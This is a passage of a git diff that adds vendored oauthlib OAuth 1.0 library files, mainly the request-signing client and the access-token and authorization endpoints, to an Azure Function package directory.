+from .rfc5849.endpoints import SignatureOnlyEndpoint, WebApplicationServer
+from .rfc5849.errors import (InsecureTransportError,
+                             InvalidClientError,
+                             InvalidRequestError,
+                             InvalidSignatureMethodError,
+                             OAuth1Error)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc
new file mode 100644
index 0000000..d15a3e7
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__init__.py
new file mode 100644
index 0000000..c123f54
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__init__.py
@@ -0,0 +1,365 @@
+"""
+oauthlib.oauth1.rfc5849
+~~~~~~~~~~~~~~
+
+This module is an implementation of various logic needed
+for signing and checking OAuth 1.0 RFC 5849 requests.
+
+It supports all three standard signature methods defined in RFC 5849:
+
+- HMAC-SHA1
+- RSA-SHA1
+- PLAINTEXT
+
+It also supports signature methods that are not defined in RFC 5849. These are
+based on the standard ones but replace SHA-1 with the more secure SHA-256:
+
+- HMAC-SHA256
+- RSA-SHA256
+
+"""
+import base64
+import hashlib
+import logging
+import urllib.parse as urlparse
+
+from oauthlib.common import (
+    Request, generate_nonce, generate_timestamp, to_unicode, urlencode,
+)
+
+from . import parameters, signature
+
+log = logging.getLogger(__name__)
+
+# Available signature methods
+#
+# Note: SIGNATURE_HMAC and SIGNATURE_RSA are kept for backward compatibility
+# with previous versions of this library, when the only HMAC-based and
+# RSA-based signature methods were HMAC-SHA1 and RSA-SHA1. But now that it
+# supports other hashing algorithms besides SHA1, explicitly identifying which
+# hashing algorithm is being used is recommended.
+#
+# Note: if additional values are defined here, don't forget to update the
+# imports in "../__init__.py" so they are available outside this module.
+ +SIGNATURE_HMAC_SHA1 = "HMAC-SHA1" +SIGNATURE_HMAC_SHA256 = "HMAC-SHA256" +SIGNATURE_HMAC_SHA512 = "HMAC-SHA512" +SIGNATURE_HMAC = SIGNATURE_HMAC_SHA1 # deprecated variable for HMAC-SHA1 + +SIGNATURE_RSA_SHA1 = "RSA-SHA1" +SIGNATURE_RSA_SHA256 = "RSA-SHA256" +SIGNATURE_RSA_SHA512 = "RSA-SHA512" +SIGNATURE_RSA = SIGNATURE_RSA_SHA1 # deprecated variable for RSA-SHA1 + +SIGNATURE_PLAINTEXT = "PLAINTEXT" + +SIGNATURE_METHODS = ( + SIGNATURE_HMAC_SHA1, + SIGNATURE_HMAC_SHA256, + SIGNATURE_HMAC_SHA512, + SIGNATURE_RSA_SHA1, + SIGNATURE_RSA_SHA256, + SIGNATURE_RSA_SHA512, + SIGNATURE_PLAINTEXT +) + +SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER' +SIGNATURE_TYPE_QUERY = 'QUERY' +SIGNATURE_TYPE_BODY = 'BODY' + +CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded' + + +class Client: + + """A client used to sign OAuth 1.0 RFC 5849 requests.""" + SIGNATURE_METHODS = { + SIGNATURE_HMAC_SHA1: signature.sign_hmac_sha1_with_client, + SIGNATURE_HMAC_SHA256: signature.sign_hmac_sha256_with_client, + SIGNATURE_HMAC_SHA512: signature.sign_hmac_sha512_with_client, + SIGNATURE_RSA_SHA1: signature.sign_rsa_sha1_with_client, + SIGNATURE_RSA_SHA256: signature.sign_rsa_sha256_with_client, + SIGNATURE_RSA_SHA512: signature.sign_rsa_sha512_with_client, + SIGNATURE_PLAINTEXT: signature.sign_plaintext_with_client + } + + @classmethod + def register_signature_method(cls, method_name, method_callback): + cls.SIGNATURE_METHODS[method_name] = method_callback + + def __init__(self, client_key, + client_secret=None, + resource_owner_key=None, + resource_owner_secret=None, + callback_uri=None, + signature_method=SIGNATURE_HMAC_SHA1, + signature_type=SIGNATURE_TYPE_AUTH_HEADER, + rsa_key=None, verifier=None, realm=None, + encoding='utf-8', decoding=None, + nonce=None, timestamp=None): + """Create an OAuth 1 client. + + :param client_key: Client key (consumer key), mandatory. + :param resource_owner_key: Resource owner key (oauth token). + :param resource_owner_secret: Resource owner secret (oauth token secret). + :param callback_uri: Callback used when obtaining request token. + :param signature_method: SIGNATURE_HMAC, SIGNATURE_RSA or SIGNATURE_PLAINTEXT. + :param signature_type: SIGNATURE_TYPE_AUTH_HEADER (default), + SIGNATURE_TYPE_QUERY or SIGNATURE_TYPE_BODY + depending on where you want to embed the oauth + credentials. + :param rsa_key: RSA key used with SIGNATURE_RSA. + :param verifier: Verifier used when obtaining an access token. + :param realm: Realm (scope) to which access is being requested. + :param encoding: If you provide non-unicode input you may use this + to have oauthlib automatically convert. + :param decoding: If you wish that the returned uri, headers and body + from sign be encoded back from unicode, then set + decoding to your preferred encoding, i.e. utf-8. + :param nonce: Use this nonce instead of generating one. (Mainly for testing) + :param timestamp: Use this timestamp instead of using current. 
(Mainly for testing) + """ + # Convert to unicode using encoding if given, else assume unicode + encode = lambda x: to_unicode(x, encoding) if encoding else x + + self.client_key = encode(client_key) + self.client_secret = encode(client_secret) + self.resource_owner_key = encode(resource_owner_key) + self.resource_owner_secret = encode(resource_owner_secret) + self.signature_method = encode(signature_method) + self.signature_type = encode(signature_type) + self.callback_uri = encode(callback_uri) + self.rsa_key = encode(rsa_key) + self.verifier = encode(verifier) + self.realm = encode(realm) + self.encoding = encode(encoding) + self.decoding = encode(decoding) + self.nonce = encode(nonce) + self.timestamp = encode(timestamp) + + def __repr__(self): + attrs = vars(self).copy() + attrs['client_secret'] = '****' if attrs['client_secret'] else None + attrs['rsa_key'] = '****' if attrs['rsa_key'] else None + attrs[ + 'resource_owner_secret'] = '****' if attrs['resource_owner_secret'] else None + attribute_str = ', '.join('{}={}'.format(k, v) for k, v in attrs.items()) + return '<{} {}>'.format(self.__class__.__name__, attribute_str) + + def get_oauth_signature(self, request): + """Get an OAuth signature to be used in signing a request + + To satisfy `section 3.4.1.2`_ item 2, if the request argument's + headers dict attribute contains a Host item, its value will + replace any netloc part of the request argument's uri attribute + value. + + .. _`section 3.4.1.2`: https://tools.ietf.org/html/rfc5849#section-3.4.1.2 + """ + if self.signature_method == SIGNATURE_PLAINTEXT: + # fast-path + return signature.sign_plaintext(self.client_secret, + self.resource_owner_secret) + + uri, headers, body = self._render(request) + + collected_params = signature.collect_parameters( + uri_query=urlparse.urlparse(uri).query, + body=body, + headers=headers) + log.debug("Collected params: {}".format(collected_params)) + + normalized_params = signature.normalize_parameters(collected_params) + normalized_uri = signature.base_string_uri(uri, headers.get('Host', None)) + log.debug("Normalized params: {}".format(normalized_params)) + log.debug("Normalized URI: {}".format(normalized_uri)) + + base_string = signature.signature_base_string(request.http_method, + normalized_uri, normalized_params) + + log.debug("Signing: signature base string: {}".format(base_string)) + + if self.signature_method not in self.SIGNATURE_METHODS: + raise ValueError('Invalid signature method.') + + sig = self.SIGNATURE_METHODS[self.signature_method](base_string, self) + + log.debug("Signature: {}".format(sig)) + return sig + + def get_oauth_params(self, request): + """Get the basic OAuth parameters to be used in generating a signature. + """ + nonce = (generate_nonce() + if self.nonce is None else self.nonce) + timestamp = (generate_timestamp() + if self.timestamp is None else self.timestamp) + params = [ + ('oauth_nonce', nonce), + ('oauth_timestamp', timestamp), + ('oauth_version', '1.0'), + ('oauth_signature_method', self.signature_method), + ('oauth_consumer_key', self.client_key), + ] + if self.resource_owner_key: + params.append(('oauth_token', self.resource_owner_key)) + if self.callback_uri: + params.append(('oauth_callback', self.callback_uri)) + if self.verifier: + params.append(('oauth_verifier', self.verifier)) + + # providing body hash for requests other than x-www-form-urlencoded + # as described in https://tools.ietf.org/html/draft-eaton-oauth-bodyhash-00#section-4.1.1 + # 4.1.1. When to include the body hash + # * [...] 
MUST NOT include an oauth_body_hash parameter on requests with form-encoded request bodies + # * [...] SHOULD include the oauth_body_hash parameter on all other requests. + # Note that SHA-1 is vulnerable. The spec acknowledges that in https://tools.ietf.org/html/draft-eaton-oauth-bodyhash-00#section-6.2 + # At this time, no further effort has been made to replace SHA-1 for the OAuth Request Body Hash extension. + content_type = request.headers.get('Content-Type', None) + content_type_eligible = content_type and content_type.find('application/x-www-form-urlencoded') < 0 + if request.body is not None and content_type_eligible: + params.append(('oauth_body_hash', base64.b64encode(hashlib.sha1(request.body.encode('utf-8')).digest()).decode('utf-8'))) + + return params + + def _render(self, request, formencode=False, realm=None): + """Render a signed request according to signature type + + Returns a 3-tuple containing the request URI, headers, and body. + + If the formencode argument is True and the body contains parameters, it + is escaped and returned as a valid formencoded string. + """ + # TODO what if there are body params on a header-type auth? + # TODO what if there are query params on a body-type auth? + + uri, headers, body = request.uri, request.headers, request.body + + # TODO: right now these prepare_* methods are very narrow in scope--they + # only affect their little thing. In some cases (for example, with + # header auth) it might be advantageous to allow these methods to touch + # other parts of the request, like the headers—so the prepare_headers + # method could also set the Content-Type header to x-www-form-urlencoded + # like the spec requires. This would be a fundamental change though, and + # I'm not sure how I feel about it. + if self.signature_type == SIGNATURE_TYPE_AUTH_HEADER: + headers = parameters.prepare_headers( + request.oauth_params, request.headers, realm=realm) + elif self.signature_type == SIGNATURE_TYPE_BODY and request.decoded_body is not None: + body = parameters.prepare_form_encoded_body( + request.oauth_params, request.decoded_body) + if formencode: + body = urlencode(body) + headers['Content-Type'] = 'application/x-www-form-urlencoded' + elif self.signature_type == SIGNATURE_TYPE_QUERY: + uri = parameters.prepare_request_uri_query( + request.oauth_params, request.uri) + else: + raise ValueError('Unknown signature type specified.') + + return uri, headers, body + + def sign(self, uri, http_method='GET', body=None, headers=None, realm=None): + """Sign a request + + Signs an HTTP request with the specified parts. + + Returns a 3-tuple of the signed request's URI, headers, and body. + Note that http_method is not returned as it is unaffected by the OAuth + signing process. Also worth noting is that duplicate parameters + will be included in the signature, regardless of where they are + specified (query, body). + + The body argument may be a dict, a list of 2-tuples, or a formencoded + string. The Content-Type header must be 'application/x-www-form-urlencoded' + if it is present. + + If the body argument is not one of the above, it will be returned + verbatim as it is unaffected by the OAuth signing process. Attempting to + sign a request with non-formencoded data using the OAuth body signature + type is invalid and will raise an exception. + + If the body does contain parameters, it will be returned as a properly- + formatted formencoded string. 
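+
+    Illustrative call (the endpoint and credentials are placeholders)::
+
+        >>> client = Client('your_client_key', client_secret='your_secret')
+        >>> uri, headers, body = client.sign(
+        ...     'https://api.example.com/photos',
+        ...     http_method='POST',
+        ...     body={'title': 'vacation'},
+        ...     headers={'Content-Type': 'application/x-www-form-urlencoded'})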
+ + Body may not be included if the http_method is either GET or HEAD as + this changes the semantic meaning of the request. + + All string data MUST be unicode or be encoded with the same encoding + scheme supplied to the Client constructor, default utf-8. This includes + strings inside body dicts, for example. + """ + # normalize request data + request = Request(uri, http_method, body, headers, + encoding=self.encoding) + + # sanity check + content_type = request.headers.get('Content-Type', None) + multipart = content_type and content_type.startswith('multipart/') + should_have_params = content_type == CONTENT_TYPE_FORM_URLENCODED + has_params = request.decoded_body is not None + # 3.4.1.3.1. Parameter Sources + # [Parameters are collected from the HTTP request entity-body, but only + # if [...]: + # * The entity-body is single-part. + if multipart and has_params: + raise ValueError( + "Headers indicate a multipart body but body contains parameters.") + # * The entity-body follows the encoding requirements of the + # "application/x-www-form-urlencoded" content-type as defined by + # [W3C.REC-html40-19980424]. + elif should_have_params and not has_params: + raise ValueError( + "Headers indicate a formencoded body but body was not decodable.") + # * The HTTP request entity-header includes the "Content-Type" + # header field set to "application/x-www-form-urlencoded". + elif not should_have_params and has_params: + raise ValueError( + "Body contains parameters but Content-Type header was {} " + "instead of {}".format(content_type or "not set", + CONTENT_TYPE_FORM_URLENCODED)) + + # 3.5.2. Form-Encoded Body + # Protocol parameters can be transmitted in the HTTP request entity- + # body, but only if the following REQUIRED conditions are met: + # o The entity-body is single-part. + # o The entity-body follows the encoding requirements of the + # "application/x-www-form-urlencoded" content-type as defined by + # [W3C.REC-html40-19980424]. + # o The HTTP request entity-header includes the "Content-Type" header + # field set to "application/x-www-form-urlencoded". + elif self.signature_type == SIGNATURE_TYPE_BODY and not ( + should_have_params and has_params and not multipart): + raise ValueError( + 'Body signatures may only be used with form-urlencoded content') + + # We amend https://tools.ietf.org/html/rfc5849#section-3.4.1.3.1 + # with the clause that parameters from body should only be included + # in non GET or HEAD requests. Extracting the request body parameters + # and including them in the signature base string would give semantic + # meaning to the body, which it should not have according to the + # HTTP 1.1 spec. 
+ elif http_method.upper() in ('GET', 'HEAD') and has_params: + raise ValueError('GET/HEAD requests should not include body.') + + # generate the basic OAuth parameters + request.oauth_params = self.get_oauth_params(request) + + # generate the signature + request.oauth_params.append( + ('oauth_signature', self.get_oauth_signature(request))) + + # render the signed request and return it + uri, headers, body = self._render(request, formencode=True, + realm=(realm or self.realm)) + + if self.decoding: + log.debug('Encoding URI, headers and body to %s.', self.decoding) + uri = uri.encode(self.decoding) + body = body.encode(self.decoding) if body else body + new_headers = {} + for k, v in headers.items(): + new_headers[k.encode(self.decoding)] = v.encode(self.decoding) + headers = new_headers + return uri, headers, body diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..743da0e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc new file mode 100644 index 0000000..a36ea9f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc new file mode 100644 index 0000000..8ea37f6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc new file mode 100644 index 0000000..e11c686 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc new file mode 100644 index 0000000..b58cdc7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..dd8df03 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__init__.py new file mode 100644 index 0000000..e2f6a06 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__init__.py @@ -0,0 +1,8 @@ +from .access_token import AccessTokenEndpoint +from .authorization import AuthorizationEndpoint +from .base import BaseEndpoint +from .request_token import RequestTokenEndpoint +from .resource import ResourceEndpoint +from .signature_only import SignatureOnlyEndpoint + +from .pre_configured import WebApplicationServer # isort:skip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..513f11c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc new file mode 100644 index 0000000..dff163d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc new file mode 100644 index 0000000..c885779 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..cddb577 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc new file mode 100644 index 0000000..a7ec759 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc new file mode 100644 index 0000000..c508b4d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc new file mode 100644 index 0000000..c01be65 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc new file mode 100644 index 0000000..9e2b47b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py new file mode 100644 index 0000000..db369b0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py @@ -0,0 +1,215 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.access_token +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of the access token provider logic of +OAuth 1.0 RFC 5849. It validates the correctness of access token requests, +creates and persists tokens as well as create the proper response to be +returned to the client. +""" +import logging + +from oauthlib.common import urlencode + +from .. import errors +from .base import BaseEndpoint + +log = logging.getLogger(__name__) + + +class AccessTokenEndpoint(BaseEndpoint): + + """An endpoint responsible for providing OAuth 1 access tokens. + + Typical use is to instantiate with a request validator and invoke the + ``create_access_token_response`` from a view function. 
The tuple returned
+    has all information necessary (body, status, headers) to quickly form
+    and return a proper response. See :doc:`/oauth1/validator` for details on which
+    validator methods to implement for this endpoint.
+    """
+
+    def create_access_token(self, request, credentials):
+        """Create and save a new access token.
+
+        Similar to OAuth 2, indication of granted scopes will be included as a
+        space separated list in ``oauth_authorized_realms``.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :returns: The token as an urlencoded string.
+        """
+        request.realms = self.request_validator.get_realms(
+            request.resource_owner_key, request)
+        token = {
+            'oauth_token': self.token_generator(),
+            'oauth_token_secret': self.token_generator(),
+            # Backport the authorized scopes indication used in OAuth2
+            'oauth_authorized_realms': ' '.join(request.realms)
+        }
+        token.update(credentials)
+        self.request_validator.save_access_token(token, request)
+        return urlencode(token.items())
+
+    def create_access_token_response(self, uri, http_method='GET', body=None,
+                                     headers=None, credentials=None):
+        """Create an access token response, with a new request token if valid.
+
+        :param uri: The full URI of the token request.
+        :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
+        :param body: The request body as a string.
+        :param headers: The request headers as a dict.
+        :param credentials: A list of extra credentials to include in the token.
+        :returns: A tuple of 3 elements.
+                  1. A dict of headers to set on the response.
+                  2. The response body as a string.
+                  3. The response status code as an integer.
+
+        An example of a valid request::
+
+            >>> from your_validator import your_validator
+            >>> from oauthlib.oauth1 import AccessTokenEndpoint
+            >>> endpoint = AccessTokenEndpoint(your_validator)
+            >>> h, b, s = endpoint.create_access_token_response(
+            ...     'https://your.provider/access_token?foo=bar',
+            ...     headers={
+            ...         'Authorization': 'OAuth oauth_token=234lsdkf....'
+            ...     },
+            ...     credentials={
+            ...         'my_specific': 'argument',
+            ...     })
+            >>> h
+            {'Content-Type': 'application/x-www-form-urlencoded'}
+            >>> b
+            'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_authorized_realms=movies+pics&my_specific=argument'
+            >>> s
+            200
+
+        A response to an invalid request would have a different body and status::
+
+            >>> b
+            'error=invalid_request&description=missing+resource+owner+key'
+            >>> s
+            400
+
+        The same goes for an unauthorized request::
+
+            >>> b
+            ''
+            >>> s
+            401
+        """
+        resp_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+        try:
+            request = self._create_request(uri, http_method, body, headers)
+            valid, processed_request = self.validate_access_token_request(
+                request)
+            if valid:
+                token = self.create_access_token(request, credentials or {})
+                self.request_validator.invalidate_request_token(
+                    request.client_key,
+                    request.resource_owner_key,
+                    request)
+                return resp_headers, token, 200
+            else:
+                return {}, None, 401
+        except errors.OAuth1Error as e:
+            return resp_headers, e.urlencoded, e.status_code
+
+    def validate_access_token_request(self, request):
+        """Validate an access token request.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :raises: OAuth1Error if the request is invalid.
+        :returns: A tuple of 2 elements.
+                  1. The validation result (True or False).
+                  2. The request object.
+        """
+        self._check_transport_security(request)
+        self._check_mandatory_parameters(request)
+
+        if not request.resource_owner_key:
+            raise errors.InvalidRequestError(
+                description='Missing resource owner.')
+
+        if not self.request_validator.check_request_token(
+                request.resource_owner_key):
+            raise errors.InvalidRequestError(
+                description='Invalid resource owner key format.')
+
+        if not request.verifier:
+            raise errors.InvalidRequestError(
+                description='Missing verifier.')
+
+        if not self.request_validator.check_verifier(request.verifier):
+            raise errors.InvalidRequestError(
+                description='Invalid verifier format.')
+
+        if not self.request_validator.validate_timestamp_and_nonce(
+                request.client_key, request.timestamp, request.nonce, request,
+                request_token=request.resource_owner_key):
+            return False, request
+
+        # The server SHOULD return a 401 (Unauthorized) status code when
+        # receiving a request with invalid client credentials.
+        # Note: This is postponed in order to avoid timing attacks, instead
+        # a dummy client is assigned and used to maintain near constant
+        # time request verification.
+        #
+        # Note that early exit would enable client enumeration
+        valid_client = self.request_validator.validate_client_key(
+            request.client_key, request)
+        if not valid_client:
+            request.client_key = self.request_validator.dummy_client
+
+        # The server SHOULD return a 401 (Unauthorized) status code when
+        # receiving a request with invalid or expired token.
+        # Note: This is postponed in order to avoid timing attacks, instead
+        # a dummy token is assigned and used to maintain near constant
+        # time request verification.
+        #
+        # Note that early exit would enable resource owner enumeration
+        valid_resource_owner = self.request_validator.validate_request_token(
+            request.client_key, request.resource_owner_key, request)
+        if not valid_resource_owner:
+            request.resource_owner_key = self.request_validator.dummy_request_token
+
+        # The server MUST verify (Section 3.2) the validity of the request,
+        # ensure that the resource owner has authorized the provisioning of
+        # token credentials to the client, and ensure that the temporary
+        # credentials have not expired or been used before. The server MUST
+        # also verify the verification code received from the client.
+        # .. _`Section 3.2`: https://tools.ietf.org/html/rfc5849#section-3.2
+        #
+        # Note that early exit would enable resource owner authorization
+        # verifier enumeration.
+        valid_verifier = self.request_validator.validate_verifier(
+            request.client_key,
+            request.resource_owner_key,
+            request.verifier,
+            request)
+
+        valid_signature = self._check_signature(request, is_token_request=True)
+
+        # log the results to the validator_log
+        # this lets us handle internal reporting and analysis
+        request.validator_log['client'] = valid_client
+        request.validator_log['resource_owner'] = valid_resource_owner
+        request.validator_log['verifier'] = valid_verifier
+        request.validator_log['signature'] = valid_signature
+
+        # We delay checking validity until the very end, using dummy values for
+        # calculations and fetching secrets/keys to ensure the flow of every
+        # request remains almost identical regardless of whether valid values
+        # have been supplied.
+ # prevents malicious users from guessing sensitive information
+ v = all((valid_client, valid_resource_owner, valid_verifier,
+ valid_signature))
+ if not v:
+ log.info("[Failure] request verification failed.")
+ log.info("Valid client: %s", valid_client)
+ log.info("Valid token: %s", valid_resource_owner)
+ log.info("Valid verifier: %s", valid_verifier)
+ log.info("Valid signature: %s", valid_signature)
+ return v, request
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/authorization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/authorization.py
new file mode 100644
index 0000000..6d8fb07
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/authorization.py
@@ -0,0 +1,158 @@
+# -*- coding: utf-8 -*-
+"""
+oauthlib.oauth1.rfc5849.endpoints.authorization
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of various logic needed
+for signing and checking OAuth 1.0 RFC 5849 requests.
+"""
+from urllib.parse import urlencode
+
+from oauthlib.common import add_params_to_uri
+
+from .. import errors
+from .base import BaseEndpoint
+
+
+class AuthorizationEndpoint(BaseEndpoint):
+
+ """An endpoint responsible for letting authenticated users authorize access
+ to their protected resources to a client.
+
+ Typical use would be to have two views, one for displaying the authorization
+ form and one to process said form on submission.
+
+ The first view will want to utilize ``get_realms_and_credentials`` to fetch
+ requested realms and useful client credentials, such as name and
+ description, to be used when creating the authorization form.
+
+ During form processing you can use ``create_authorization_response`` to
+ validate the request, create a verifier as well as prepare the final
+ redirection URI used to send the user back to the client.
+
+ See :doc:`/oauth1/validator` for details on which validator methods to implement
+ for this endpoint.
+ """
+
+ def create_verifier(self, request, credentials):
+ """Create and save a new verifier.
+
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :param credentials: A dict of extra token credentials.
+ :returns: The verifier as a dict.
+ """
+ verifier = {
+ 'oauth_token': request.resource_owner_key,
+ 'oauth_verifier': self.token_generator(),
+ }
+ verifier.update(credentials)
+ self.request_validator.save_verifier(
+ request.resource_owner_key, verifier, request)
+ return verifier
+
+ def create_authorization_response(self, uri, http_method='GET', body=None,
